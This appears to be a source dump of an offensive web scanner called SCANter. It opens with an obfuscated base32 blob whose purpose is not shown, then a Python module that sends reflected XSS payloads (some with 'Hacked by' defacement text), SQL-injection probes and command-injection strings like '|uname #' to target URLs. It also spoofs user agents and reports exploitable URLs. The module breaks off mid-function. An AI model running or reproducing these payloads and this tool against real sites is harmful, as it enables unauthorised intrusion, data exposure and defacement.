HI2LNMVXT25DJNVSW6LDEMVRW6PLFNZRW6ZDFMQWHMZLSOQ6XMZLSOQWHEZLENFZD24TFMRUXELDEMF2GKPLEMF2GKLDNMV2GQ33EHUTXA33TOQTSYY3BM5SW45B5MNQWOZLOOQWHA4TPPB4T24DSN54HSLDTNRYD243MMVSXALDCMF2GG2B5MJQXIY3IFEFASCLFNRZWKOQKBEEQS2LGEBXG64DBOI5AUCIJBEEWQZLBMRSXE427ONRWC3TOMVZC44TFMZSXE4TFOJPXQ43TFB2XE3BMMNXW623JMU6WG33PNNUWKLDUNFWWK3Z5ORUW2ZLPFRSGKY3PHVSW4Y3PMRSWILDWMVZHIPLWMVZHILDSMVSGS4R5OJSWI2LSFRWWK5DIN5SD2J3HMV2COLDDMFTWK3TUHVRWCZ3FNZ2CY4DSN54HSPLQOJXXQ6JMONWHAPLTNRSWK4BMMJQXIY3IHVRGC5DDNAUQUCIJBEEWQZLBMRSXE427ONRWC3TOMVZC44TFMZSXE4TFOJPXG4LMNEUHK4TMFRRW633LNFST2Y3PN5VWSZJMORUW2ZLPHV2GS3LFN4WGIZLDN46WK3TDN5SGKZBMOZSXE5B5OZSXE5BMOJSWI2LSHVZGKZDJOIWG2ZLUNBXWIPJHM5SXIJZMMNQWOZLOOQ6WGYLHMVXHILDQOJXXQ6J5OBZG66DZFRZWY4B5ONWGKZLQFRRGC5DDNA6WEYLUMNUCSCQJBEEQS2DFMFSGK4TTL5ZWGYLONZSXELTSMVTGK4TSMVZF64TDMUUHK4TMFRRW633LNFST2Y3PN5VWSZJMORUW2ZLPHV2GS3LFN4WGIZLDN46WK3TDN5SGKZBMOZSXE5B5OZSXE5BMOJSWI2LSHVZGKZDJOIWG2ZLUNBXWIPJHM5SXIJZMMNQWOZLOOQ6WGYLHMVXHILDQOJXXQ6J5OBZG66DZFRZWY4B5ONWGKZLQFRRGC5DDNA6WEYLUMNUCSCQJBEEQS2DFMFSGK4TTL5ZWGYLONZSXELTVONSXEX3BM5SW45C7PBZXGKDVOJWCYY3PN5VWSZJ5MNXW623JMUWHI2LNMVXT25DJNVSW6LDEMVRW6PLFNZRW6ZDFMQWHMZLSOQ6XMZLSOQWHEZLENFZD24TFMRUXELDNMV2GQ33EHUTWOZLUE4WGGYLHMVXHIPLDMFTWK3TUFRYHE33YPE6XA4TPPB4SY43MOA6XG3DFMVYCYYTBORRWQPLCMF2GG2BJBIEQSCIJNBSWCZDFOJZV643DMFXG4ZLSFZ2XGZLSL5QWOZLOORPXG4LMNEUHK4TMFRRW633LNFST2Y3PN5VWSZJMORUW2ZLPHV2GS3LFN4WGIZLDN46WK3TDN5SGKZBMOZSXE5B5OZSXE5BMOJSWI2LSHVZGKZDJOIWG2ZLUNBXWIPJHM5SXIJZMMNQWOZLOOQ6WGYLHMVXHILDQOJXXQ6J5OBZG66DZFRZWY4B5ONWGKZLQFRRGC5DDNA6WEYLUMNUCSCQJBEEQS2DFMFSGK4TTL5ZWGYLONZSXELTVONSXEX3BM5SW45C7OJRWKKDVOJWCYY3PN5VWSZJ5MNXW623JMUWHI2LNMVXT25DJNVSW6LDEMVRW6PLFNZRW6ZDFMQWHMZLSOQ6XMZLSOQWHEZLENFZD24TFMRUXELDNMV2GQ33EHUTWOZLUE4WGGYLHMVXHIPLDMFTWK3TUFRYHE33YPE6XA4TPPB4SY43MOA6XG3DFMVYCYYTBORRWQPLCMF2GG2BJBIEQSCLFNRUWMIDZMVUDUCQJBEEQS5ROONYWY2JIOVZGYLDDN5XWW2LFFR2GS3LFN4WGK3TDN5SGKZBMOZSXE5BMOJSWI2LSFRRWCZ3FNZ2D2Y3BM5SW45BMOBZG66DZHVYHE33YPEWHG3DQHVZWYZLFOAWGEYLUMNUD2YTBORRWQKIKBEEQSCLWFZ4HG4ZIOVZGYLDDN5XWW2LFFR2GS3LFN4WGK3TDN5SGKZBMOZSXE5BMOJSWI2LSFRRWCZ3FNZ2D2Y3BM5SW45BMOBZG66DZHVYHE33YPEWHG3DQHVZWYZLFOAWGEYLUMNUD2YTBORRWQKIKBEEQSCLWFZXXG2LONIUHK4TMFRRW633LNFSSY5DJNVSW6LDFNZRW6ZDFMQWHMZLSOQWHEZLENFZCYY3BM5SW45B5MNQWOZLOOQWHA4TPPB4T24DSN54HSLDTNRYD243MMVSXALDCMF2GG2B5MJQXIY3IFEFASCIJBF3C443TORUSQ5LSNQWGG33PNNUWKLDUNFWWK3ZMMVXGG33EMVSCY5TFOJ2CY4TFMRUXELDDMFTWK3TUHVRWCZ3FNZ2CY4DSN54HSPLQOJXXQ6JMONWHAPLTNRSWK4BMMJQXIY3IHVRGC5DDNAUQUCIJBFSWY43FHIFASCIJBF3C443RNRUSQ5LSNQWGG33PNNUWKLDUNFWWK3ZMMVXGG33EMVSCY5TFOJ2CY4TFMRUXELDDMFTWK3TUHVRWCZ3FNZ2CY4DSN54HSPLQOJXXQ6JMONWHAPLTNRSWK4BMMJQXIY3IHVRGC5DDNAUQUCIJBEEXMLTYONZSQ5LSNQWGG33PNNUWKLDUNFWWK3ZMMVXGG33EMVSCY5TFOJ2CY4TFMRUXELDDMFTWK3TUHVRWCZ3FNZ2CY4DSN54HSPLQOJXXQ6JMONWHAPLTNRSWK4BMMJQXIY3IHVRGC5DDNAUQUCIJBEEXMLTPONUW42RIOVZGYLDDN5XWW2LFFR2GS3LFN4WGK3TDN5SGKZBMOZSXE5BMOJSWI2LSFRRWCZ3FNZ2D2Y3BM5SW45BMOBZG66DZHVYHE33YPEWHG3DQHVZWYZLFOAWGEYLUMNUD2YTBORRWQKIKBEEQSCLWFZZXG5DJFB2XE3BMMNXW623JMUWHI2LNMVXSYZLOMNXWIZLEFR3GK4TUFRZGKZDJOIWGGYLHMVXHIPLDMFTWK3TUFRYHE33YPE6XA4TPPB4SY43MOA6XG3DFMVYCYYTBORRWQPLCMF2GG2BJBIEQSCIJNBSWCZDFOJZV643DMFXG4ZLSFZZGKZTFOJZGK4S7PBZXGKDVOJWCYY3PN5VWSZJ5MNXW623JMUWHI2LNMVXT25DJNVSW6LDEMVRW6PLFNZRW6ZDFMQWHMZLSOQ6XMZLSOQWHEZLENFZD24TFMRUXELDNMV2GQ33EHUTWOZLUE4WGGYLHMVXHIPLDMFTWK3TUFRYHE33YPE6XA4TPPB4SY43MOA6XG3DFMVYCYYTBORRWQPLCMF2GG2BJBIEQSCIJNBSWCZDFOJZV643DMFXG4ZLSFZZGKZTFOJZGK4S7ONYWY2JIOVZGYLDDN5XWW2LFHVRW633LNFSSY5DJNVSW6PLUNFWWK3ZMMRSWG3Z5MVXGG33EMVSCY5TFOJ2D25TFOJ2CY4TFMRUXEPLSMVSGS4RMNVSXI2DPMQ6SOZ3FOQTSYY3BM5SW45B5MNQWOZLOOQWHA4TPPB4T24DSN54HSLDTNRYD243MMVSXALDCMF2GG2B5MJQXIY3IFEFASCIJBFUGKYLEMVZHGX3TMNQW43TFOIXHEZLGMVZHEZLSL5ZGGZJIOVZGYLDDN5XWW2LFHVRW633LNFSSY5DJNVSW6PLUNFWWK3ZMMRSWG3Z5MVXGG33EMVSCY5TFOJ2D25TFOJ2CY4TFMRUXEPLSMVSGS4RMNVSXI2DPMQ6SOZ3FOQTSYY3BM5SW45B5MNQWOZLOOQWHA4TPPB4T24DSN54HSLDTNRYD243MMVSXALDCMF2GG2B5MJQXIY3IFEFASCIJBFUGKYLEMVZHGX3TMNQW43TFOIXHK43FOJPWCZ3FNZ2F66DTOMUHK4TMFRRW633LNFST2Y3PN5VWSZJMORUW2ZLPHV2GS3LFN4WGIZLDN46WK3TDN5SGKZBMOZSXE5B5OZSXE5BMOJSWI2LSHVZGKZDJOIWG2ZLUNBXWIPJHM5SXIJZMMNQWOZLOOQ6WGYLHMVXHILDQOJXXQ6J5OBZG66DZFRZWY4B5ONWGKZLQFRRGC5DDNA6WEYLUMNUCSCQJBEEQS2DFMFSGK4TTL5ZWGYLONZSXELTVONSXEX3BM5SW45C7ONYWY2JIOVZGYLDDN5XWW2LFHVRW633LNFSSY5DJNVSW6PLUNFWWK3ZMMRSWG3Z5MVXGG33EMVSCY5TFOJ2D25TFOJ2CY4TFMRUXEPLSMVSGS4RMNVSXI2DPMQ6SOZ3FOQTSYY3BM5SW45B5MNQWOZLOOQWHA4TPPB4T24DSN54HSLDTNRYD243MMVSXALDCMF2GG2B5MJQXIY3IFEFASCIJBFUGKYLEMVZHGX3TMNQW43TFOIXHK43FOJPWCZ3FNZ2F64TDMUUHK4TMFRRW633LNFST2Y3PN5VWSZJMORUW2ZLPHV2GS3LFN4WGIZLDN46WK3TDN5SGKZBMOZSXE5B5OZSXE5BMOJSWI2LSHVZGKZDJOIWG2ZLUNBXWIPJHM5SXIJZMMNQWOZLOOQ6WGYLHMVXHILDQOJXXQ6J5OBZG66DZFRZWY4B5ONWGKZLQFRRGC5DDNA6WEYLUMNUCSCQJMV4GGZLQOQQEWZLZMJXWC4TEJFXHIZLSOJ2XA5B2BIEQS4DSNFXHIKDGE5OG463CMFSH2ICHN5XWIICCPFSSAORJLRXCOKIKBEEWK6DJOQUCSCQJMV4GGZLQOQQFE5LOORUW2ZKFOJZG64R2BIEQS3DPM5TWK4ROMVZHE33SFBTCEXDOPNRGCZD5EBRWC3RHOQQHG5DBOJ2CA3TFO4QHI2DSMVQWIIBOFYQCQJZNFV2GQ4TFMFSHGPJRGAYCOKJCFEFASCLFPBUXIKBJBIEWK6DDMVYHIIDSMVYXKZLTORZS4ZLYMNSXA5DJN5XHGLSDN5XG4ZLDORUW63SFOJZG64R2BIEQS3DPM5TWK4ROMVZHE33SFBTCE2DPON2CAJ33MJWHKZL5PN2XE3D5PNSW4ZD5E4QGI33FOMQG433UEBSXQ2LTOQQC4LRBEIUQUCIJMV4GS5BIFEFASZLYMNSXA5BAOJSXC5LFON2HGLTFPBRWK4DUNFXW44ZOKJSWCZCUNFWWK33VOQ5AUCIJNRXWOZ3FOIXGK4TSN5ZCQZRCLRXFI2LNMVXXK5BAIVZHE33SEARCSCQJBFSXQ2LUFAUQUCLFPBRWK4DUEBZGK4LVMVZXI4ZOMV4GGZLQORUW63TTFZIHE33YPFCXE4TPOI5AUCIJNRXWOZ3FOIXGK4TSN5ZCQZRCKBZG66DZEBBW63TOMVRXI2LPNYQEK4TSN5ZCEKIKBEEWK6DJOQUCSCQJMV4GGZLQOQQHEZLROVSXG5DTFZSXQY3FOB2GS33OOMXES3TWMFWGSZCVKJGDUCQJBFWG6Z3HMVZC4ZLSOJXXEKDGEJEW45TBNRUWIICVKJGCEKIKBEEWK6DJOQUCSCQJMV4GGZLQOQQHEZLROVSXG5DTFZSXQY3FOB2GS33OOMXES3TWMFWGSZCTMNUGK3LBHIFASCLMN5TWOZLSFZSXE4TPOIUGMISJNZ3GC3DJMQQFGY3IMFWWKIRJBIEQSZLYNF2CQKIKBFSXQY3FOB2CA4TFOF2WK43UOMXGK6DDMVYHI2LPNZZS4TLJONZWS3THKNRWQZLNME5AUCIJNRXWOZ3FOIXGK4TSN5ZCQZRCJVUXG43JNZTSAU3DNBSW2YJCFEFASCLFPBUXIKBJBI======")) 3 | -------------------------------------------------------------------------------- /core/scanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # This program is free software; you can redistribute it and/or modify 3 | # it under the terms of the GNU General Public License as published by 4 | # the Free Software Foundation; either version 2 of the License, or 5 | # (at your option) any later version. 6 | # 7 | # This program is distributed in the hope that it will be useful, 8 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | # GNU General Public License for more details. 11 | # 12 | # You should have received a copy of the GNU General Public License 13 | # along with this program; if not, write to the Free Software 14 | 15 | __author__ = 'Err0r_HB' 16 | __version__ = '0.3#beta' 17 | __github__ = 'https://github.com/Err0r-ICA/SCANter' 18 | __email__ = 'error_hb@protonmail.com' 19 | __blog__ = 'https://t.me/termuxhacks' 20 | 21 | import requests,sys,os,re,random,urllib3 22 | from .encoder import urlencoder 23 | from .colors import * 24 | from .reporter import make_report 25 | from time import sleep 26 | from .logger import logger 27 | all_bugs = [] 28 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 29 | errors = {'sqlite3':'sqlite3.OperationalError','MySQL': 'error in your SQL syntax', 30 | 'MiscError': 'mysql_fetch', 31 | 'MiscError2': 'num_rows', 32 | 'Oracle': 'ORA-01756', 33 | 'JDBC_CFM': 'Error Executing Database Query', 34 | 'JDBC_CFM2': 'SQLServer JDBC Driver', 35 | 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server', 36 | 'MSSQL_Uqm': 'Unclosed quotation mark', 37 | 'MS-Access_ODBC': 'ODBC Microsoft Access Driver', 38 | 'MS-Access_JETdb': 'Microsoft JET Database', 39 | 'Error Occurred While Processing Request' : 'Error Occurred While Processing Request', 40 | 'unkown' : 'Server Error', 41 | 'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error', 42 | 'Invalid Querystring' : 'Invalid Querystring', 43 | 'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC', 44 | 'VBScript Runtime' : 'VBScript Runtime', 45 | 'ADODB.Field' : 'ADODB.Field', 46 | 'BOF or EOF' : 'BOF or EOF', 47 | 'ADODB.Command' : 'ADODB.Command', 48 | 'JET Database' : 'JET Database', 49 | 'mysql_fetch_array()' : 'mysql_fetch_array()', 50 | 'Syntax error' : 'Syntax error', 51 | 'mysql_numrows()' : 'mysql_numrows()', 52 | 'GetArray()' : 'GetArray()', 53 | 'Fatal error': 'Fatal error', 54 | 'FetchRow()' : 'FetchRow()', 55 | 'Internal Server Error':'The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.', 56 | 'Input string was not in a correct format' : 'Input string was not in a correct format', 57 | 'Not found' : 'Not found','internal server':'The page cannot be displayed because an internal server error has occurred.','Internal Server Error':'The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application'} 58 | def uagent(payload=None,one=False,cagent=None): 59 | agents=[ 60 | 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14', 61 | 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0', 62 | 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 63 | 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 64 | 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7', 65 | 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 66 | 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 67 | 'Opera/8.01 (Windows NT 5.1; U; pl)', 68 | 'Opera/8.50 (Windows NT 5.0; U; en)', 69 | 'Opera/9.00 (Macintosh; PPC Mac OS X; U; es)', 70 | 'Opera/9.24 (X11; Linux i686; U; de)', 71 | 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53' 72 | ] 73 | if payload: 74 | if cagent: 75 | ag = cagent.encode('utf-8') + payload.encode('utf-8') 76 | return ag 77 | if one: 78 | return 'Opera/9.24 (X11; Linux i686; U; de)'.encode('utf-8') + payload.encode('utf-8') 79 | ag = random.choice(agents) + payload 80 | return ag # Add random User-agent in request 81 | if cagent: 82 | return (cagent.encode('utf-8')) 83 | if one: 84 | return 'Opera/9.24 (X11; Linux i686; U; de)' 85 | return random.choice(agents).encode('utf-8') # Add random User-agent in request 86 | class paramscanner: # Scanner Module 87 | def __init__(slef): 88 | pass 89 | def xss(slef,url,co,tim,deco,vert,redir,cagent=None,proxy=None,slp=0,batch=None): 90 | logger.info('Scanning from XSS Reflected With GET Method') 91 | deco = deco - 1 92 | if '*' in url: 93 | logger.info('relpacing (*) from url to payload') 94 | logger.info('Trying to get a reflect from the parameter') 95 | x = 0 96 | c = requests.get(url,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 97 | if slp != 0: 98 | logger.debug(f'Sleeping {slp} sec') 99 | sleep(slp) 100 | ch = re.findall('ScanT3r'.encode('utf-8'),c.content) 101 | logger.info('Send http request with "ScanT3r" word for get a reflect') 102 | if slp != 0: 103 | logger.debug(f'Sleeping {slp} sec') 104 | sleep(slp) 105 | check = requests.get(url.replace('*','ScanT3r'),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 106 | che = re.findall('ScanT3r'.encode('utf-8'),check.content) 107 | if len(ch) < len(che): 108 | logger.info('reflect is found') 109 | payloads=['"

Hacked by Err0r_HB

"','">Err0r_HB','">
MOVE HERE
','">','">','',"'>"] 110 | logger.info('Trying to get XSS from the parameter') 111 | for payload in payloads: 112 | payload2=urlencoder(payload) 113 | for i in range(deco): 114 | payload2=urlencoder(payload2) 115 | if slp != 0: 116 | logger.debug(f'Sleeping {slp} sec') 117 | sleep(slp) 118 | r=requests.get(url.replace('*',payload2),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 119 | if payload.encode('utf-8') in r.content: 120 | j=url.replace('*',payload2) 121 | print(f""" 122 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 123 | {bold}{good}{bold} Bug Found : XSS Reflected 124 | {info}{bold} Payload : {payload} 125 | {info}{bold} Exploit : {j} 126 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 127 | if batch: 128 | print('\n Continue ? [Y,n] Y') 129 | else: 130 | cont = input('\n Continue ? [Y,n]').lower() 131 | if cont != '': 132 | exit() 133 | elif cont != 'y': 134 | exit() 135 | x = 1 136 | break 137 | if x == 0: 138 | logger.info("Not vulnerable from XSS With GET Method") 139 | else: 140 | pass 141 | elif '*' not in url: 142 | payloads=['"

Hacked by Err0r_HB

"','">ScanT3r','">
MOVE HERE
','">','">'] 143 | x = 0 144 | for params in url.split("?")[1].split("&"): 145 | if slp != 0: 146 | logger.debug(f'Sleeping {slp} sec') 147 | sleep(slp) 148 | r2 = requests.get(url.replace(params, params + str('ScanT3r')),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 149 | if slp != 0: 150 | logger.debug(f'Sleeping {slp} sec') 151 | sleep(slp) 152 | r1 = requests.get(url,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 153 | r2 = re.findall('ScanT3r'.encode('utf-8'),r2.content) 154 | r1 = re.findall('ScanT3r'.encode('utf-8'),r1.content) 155 | if len(r2) > len(r1): 156 | logger.info('reflect is Found') 157 | for payload in payloads: 158 | payload2=urlencoder(payload) 159 | for i in range(deco): 160 | payload2=urlencoder(payload2) # encode the payload 161 | sleep(slp) 162 | logger.info('try to get xss from the reflect') 163 | r=requests.get(url.replace(params, params + str(payload2).strip()),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 164 | if payload.encode('utf-8') in r.content: 165 | j=url.replace(params, params + str(payload2).strip()) 166 | print(f""" 167 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 168 | {bold}{good}{bold} Bug Found : XSS Reflected 169 | {info}{bold} Payload : {payload} 170 | {info}{bold} Param : {params} 171 | {info}{bold} Exploit : {j} 172 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 173 | x = 1 174 | if batch: 175 | print('\n Continue ? [Y,n] Y') 176 | else: 177 | cont = input('\n Continue ? [Y,n]').lower() 178 | if cont != '': 179 | exit() 180 | elif cont != 'y': 181 | exit() 182 | break 183 | if x == 0: 184 | logger.info("Not vulnerable from XSS With GET Method") 185 | else: 186 | break 187 | def xss_post(self,url,co,tim,dat,vert,redir,cagent=None,proxy=None,slp=0,batch=None): 188 | ok = False 189 | logger.info('Scanning from XSS With POST Method') 190 | for i,d in dat.items(): 191 | if '*' in d: 192 | ok = True 193 | if ok: 194 | logger.info('replacing (*) from url to payload') 195 | x = 0 196 | payloads=['"

Hacked by Err0r_HB

"','">ScanT3r','">
MOVE HERE
','">','">',"","'>"] 197 | if slp != 0: 198 | logger.debug(f'Sleeping {slp} sec') 199 | sleep(slp) 200 | logger.info('Send post request for get a HTML of page') 201 | r1 = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy) 202 | if slp == 0: 203 | logger.debug(f'Sleeping {slp} sec') 204 | sleep(slp) 205 | logger.info('relpacing (*) from url to payload') 206 | for i,c in dat.items(): 207 | dat[i] = c.replace('*','ScanT3r') 208 | logger.info('Send post request with payload for get a reflect') 209 | r2 = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy) 210 | for i,c in dat.items(): 211 | dat[i] = c.replace('ScanT3r','*') 212 | r1 = re.findall('ScanT3r'.encode('utf-8'),r1.content) 213 | r2 = re.findall('ScanT3r'.encode('utf-8'),r2.content) 214 | if len(r2) > len(r1): 215 | logger.info('reflect is Found') 216 | logger.info('Trying to get xss from the parameter') 217 | for payload in payloads: 218 | for i,c in dat.items(): 219 | dat[i] = c.replace('*',payload) 220 | sleep(slp) 221 | r = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy) 222 | if payload.encode('utf-8') in r.content: 223 | print(f""" 224 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 225 | {bold}{good}{bold} Bug Found : XSS Reflected 226 | {info}{bold} Payload : {payload} 227 | {info}{bold} Method : [{yellow}POST{end}] 228 | {info}{bold} VALUS : {dat} 229 | {info}{bold} URL : {r.url} 230 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 231 | for i,c in dat.items(): 232 | dat[i] = c.replace(payload,'*') 233 | x = 1 234 | if batch: 235 | print('\n Continue ? [Y,n] Y') 236 | else: 237 | cont = input('\n Continue ? [Y,n]').lower() 238 | if cont != '': 239 | exit() 240 | elif cont != 'y': 241 | exit() 242 | break 243 | else: 244 | for i,c in dat.items(): 245 | dat[i] = c.replace(payload,'*') 246 | continue 247 | if x == 0: 248 | logger.info("Not vulnerable from XSS With GET Method") 249 | else: 250 | pass 251 | else: 252 | payloads=["'>",'"

Hacked by Err0r_HB

"','">ScanT3r','">
MOVE HERE
','">','">'] 253 | x = 0 254 | if slp != 0: 255 | logger.debug(f'Sleeping {slp} sec') 256 | sleep(slp) 257 | r1 = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy) 258 | if slp != 0: 259 | logger.debug(f'Sleeping {slp} sec') 260 | sleep(slp) 261 | for i,c in dat.items(): 262 | dat[i] = c + 'ScanT3r' 263 | logger.info('Send request with "ScanT3r" word for get a reflect') 264 | r2 = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy) 265 | for i,c in dat.items(): 266 | dat[i] = c.replace('ScanT3r','') 267 | r1 = re.findall('ScanT3r'.encode('utf-8'),r1.content) 268 | r2 = re.findall('ScanT3r'.encode('utf-8'),r2.content) 269 | if len(r2) > len(r1): 270 | logger.info('reflect is found') 271 | for payload in payloads: 272 | for i,c in dat.items(): 273 | dat[i] = c + payload 274 | sleep(slp) 275 | r = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy) 276 | if payload.encode('utf-8') in r.content: 277 | print(f""" 278 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 279 | {bold}{good}{bold} Bug Found : XSS Reflected 280 | {info}{bold} Payload : {payload} 281 | {info}{bold} Method : [{yellow}POST{end}{bold}] 282 | {info}{bold} VALUS : {dat} 283 | {info}{bold} URL : {r.url} 284 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 285 | for i,c in dat.items(): 286 | dat[i] = c.replace(payload,'') 287 | if batch: 288 | print('\n Continue ? [Y,n] Y') 289 | else: 290 | cont = input('\n Continue ? [Y,n]').lower() 291 | if cont != '': 292 | exit() 293 | elif cont != 'y': 294 | exit() 295 | x = 1 296 | break 297 | else: 298 | for i,c in dat.items(): 299 | dat[i] = c.replace(payload,'') 300 | continue 301 | if x == 0: 302 | logger.info("Not vulnerable from XSS With GET Method") 303 | def sqli_post(self,url,co,tim,dat,vert,redir,cagent=None,proxy=None,slp=0,batch=None): 304 | ok = False 305 | if slp != 0: 306 | logger.debug(f"Sleeping {slp} sec") 307 | sleep(slp) 308 | logger.info('Scanning SQLI using post method With POST Method') 309 | # te = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy) 310 | # for c,d in errors.items(): 311 | # fir = re.findall(d.encode('utf-8'),te.content) 312 | # if fir != []: 313 | # break 314 | for i,d in dat.items(): 315 | if '*' in d: 316 | ok = True 317 | if ok: 318 | payload='"' 319 | logger.info("replacing (*) from url to payload") 320 | for i,d in dat.items(): 321 | dat[i] = d.replace('*',payload) 322 | if slp != 0: 323 | logger.debug(f'Sleeping {slp} sec') 324 | sleep(slp) 325 | r = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy) 326 | x = 0 327 | for f,i in errors.items(): 328 | ch=re.findall(i.encode('utf-8'),r.content) 329 | if len(ch) > 0: 330 | print(f""" 331 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 332 | {bold}{good}{bold} Bug Found : SQL injection 333 | {info}{bold} Payload : {payload} 334 | {info}{bold} Method : [{yellow}POST{end}{bold}] 335 | {info}{bold} VALUS : {dat} 336 | {info}{bold} URL : {r.url} 337 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 338 | if batch: 339 | print('\n Continue ? [Y,n] Y') 340 | else: 341 | cont = input('\n Continue ? [Y,n]').lower() 342 | if cont != '': 343 | exit() 344 | elif cont != 'y': 345 | exit() 346 | x = 1 347 | break 348 | for i,d in dat.items(): 349 | dat[i] = d.replace(payload,'*') 350 | if x == 0: 351 | logger.info("Not vulnerable from SQLI With POST Method") 352 | else: 353 | payload='"' 354 | for i,d in dat.items(): 355 | dat[i] = d + payload 356 | if slp != 0: 357 | logger.debug(f'Sleeping {slp} sec') 358 | sleep(slp) 359 | r = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy) 360 | x = 0 361 | for f,i in errors.items(): 362 | ch=re.findall(i.encode('utf-8'),r.content) 363 | if len(ch) > 0: 364 | print(f""" 365 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 366 | {bold}{good}{bold} Bug Found : SQL injection 367 | {info}{bold} Payload : {payload} 368 | {info}{bold} Method : [{yellow}POST{end}] 369 | {info}{bold} VALUS : {dat} 370 | {info}{bold} URL : {r.url} 371 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 372 | if batch: 373 | print('\n Continue ? [Y,n] Y') 374 | else: 375 | cont = input('\n Continue ? [Y,n]').lower() 376 | if cont != '': 377 | exit() 378 | elif cont != 'y': 379 | exit() 380 | x = 1 381 | break 382 | for i,d in dat.items(): 383 | dat[i] = d.replace(payload,'') 384 | if x == 0: 385 | logger.info("Not vulnerable from SQLI") 386 | def osinj_post(self,url,co,tim,dat,vert,redir,cagent=None,proxy=None,slp=0,batch=None): 387 | if slp != 0: 388 | logger.debug(f'Sleeping {slp} sec') 389 | sleep(slp) 390 | te = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent,one=True)},proxies=proxy) 391 | fir = re.findall('Linux'.encode('utf-8'),te.content) 392 | ok = False 393 | logger.info('Scanning From RCE With POST Method') 394 | for i,d in dat.items(): 395 | if '*' in d: 396 | ok = True 397 | if ok: 398 | payloads=["|uname #",'"|uname #',"'|uname #"] 399 | logger.info('replacing (*) from url to payload') 400 | if slp != 0: 401 | logger.debug(f'Sleeping {slp} sec') 402 | sleep(slp) 403 | for payload in payloads: 404 | for i,c in dat.items(): 405 | dat[i] = c.replace('*',payload) 406 | if slp != 0: 407 | logger.debug(f'Sleeping {slp} sec') 408 | sleep(slp) 409 | logger.info('sent post request with RCE payload') 410 | r = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent,one=True)},proxies=proxy) 411 | ch = re.findall('Linux'.encode('utf-8'),r.content) 412 | x = 0 413 | if len(ch) > len(fir): 414 | print(f""" 415 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 416 | {bold}{good}{bold} Bug Found : Remote Code Execution (RCE) 417 | {info}{bold} Payload : {payload} 418 | {info}{bold} Method : [{yellow}POST{end}] 419 | {info}{bold} VALUS : {dat} 420 | {info}{bold} URL : {r.url} 421 | 